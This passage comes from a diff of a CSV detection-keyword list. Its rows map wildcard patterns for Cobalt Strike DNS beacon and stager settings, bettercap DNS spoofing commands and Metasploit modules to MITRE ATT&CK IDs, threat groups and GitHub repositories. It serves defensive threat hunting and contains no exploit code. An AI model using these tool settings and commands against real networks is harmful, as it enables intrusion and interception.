- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*dns_redir.sh *","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 